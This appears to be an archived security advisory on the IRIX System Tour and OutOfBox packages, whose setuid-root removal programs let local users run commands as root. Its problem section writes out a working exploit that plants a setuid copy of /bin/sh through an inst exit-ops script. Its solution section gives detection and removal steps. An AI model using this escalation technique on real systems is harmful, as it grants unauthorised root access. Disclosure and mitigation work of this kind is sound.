COMMAND
Systour and OutOfBox
SYSTEMS AFFECTED
IRIX 5.x, 6.0.x, 6.1, 6.2 and 6.3
PROBLEM
The Silicon Graphics Indigo Magic System Tour and OutOfBox
Experience packages are factory installed on all Silicon Graphics
Indy systems. The following text is Yuri Volobuev's credit.
The purpose of these two packages, systour and OutOfBox, are to
demonstrate and highlight the features and capabilities of the
user environment and system.
Due to the disk space requirements of these subsystems, most
sites will remove these subsystems for disk space reclamation as
part of initial system setup. Those sites which have done this
will not be vulnerable.
On those systems that the subsystems are still installed on, both
subsystems provide background setuid root programs to perform a
subsystem removal when a user decides to remove the software.
This removal is done using the standard IRIX /usr/sbin/inst
program that manages IRIX software.
Provided with the right environment, the inst program could be
manipulated to execute arbitrary commands with root privileges.
An account on the vulnerable system is required for exploit.
With an account, these vulnerabilities are exploitable by both
local and remote access. And here comes the exploit.
First, we set up an environment for running inst. dryrun is set
to true because we are considerate environmentalists.
$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
These three lines should be very familiar to all exploitors.
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
Now run it.
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
SOLUTION
There are no patches for these issues. However, using the
information below steps can be taken to eliminate the exposure.
To determine if the OutOfBox and systour subsystems are installed
on a particular system, the following command can be used:
% versions OutOfBox.sw systour.sw
I = Installed, R = Removed
Name Date Description
I OutOfBox 11/05/96 OutOfBox Experience, 1.1
I OutOfBox.sw 11/05/96 OutOfBox Experience Software, 1.1
I OutOfBox.sw.complete 11/05/96 Complete OutOfBox Experience
I OutOfBox.sw.intro 11/05/96 OutOfBox Intro Movies
I systour 02/12/96 Indigo Magic System Tour, 5.2
I systour.sw 02/12/96 System Tour Execution Environment
I systour.sw.eoe 02/12/96 System Tour Execution Environment
In the above case, the subsystems of concern are installed and
the steps below should be performed. If no output is returned by
the command, the subsystems are not installed and no further
action is required.
*** IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2 ***
The steps below can be used to remove the vulnerability by either
changing the program permissions (use step 2a) or by removing the
subsystems (use step 2b).
1) Become the root user on the system.
% /bin/su -
Password:
#
2) Choose either step 2a or 2b depending on which has the desired
result.
2a) Change the setuid root permissions on the programs of
concern.
# /bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour
# /bin/chmod u-s /usr/people/tour/oob/bin/oobversions
Removing the setuid root permissions from these tools will
prevent non-root users from removing the subsystems. Removal of
the subsystems will only be possible if the systour or OutOfBox
user is a root user or if the inst IRIX software manager is used
by root for removal.
2b) Remove the vulnerable subsystems.
# /usr/sbin/versions -v remove systour OutOfBox
4) Return to previous level.
# exit
$
*** IRIX 6.3 ***
The IRIX operating system version 6.3 does not have the System
Tour subsystem but does have the OutOfBox Experience subsystem.
The steps below can be used to remove the vulnerability by either
changing the program permissions (use step 2a) or by removing the
subsystems (use step 2b).
1) Become the root user on the system.
% /bin/su -
Password:
#
2) Choose either step 2a or 2b depending on which has the desired
result.
2a) Change the setuid root permissions on the program of concern.
# /bin/chmod u-s /usr/people/tour/oob/bin/oobversions
Removing the setuid root permissions from this program will
prevent non-root users from removing the subsystem. Removal of
the subsystem will only be possible if the OutOfBox user is a
root user or if the inst IRIX software manager is used by root
for removal.
2b) Remove the vulnerable subsystem.
# /usr/sbin/versions -v remove OutOfBox
4) Return to previous level.
# exit
$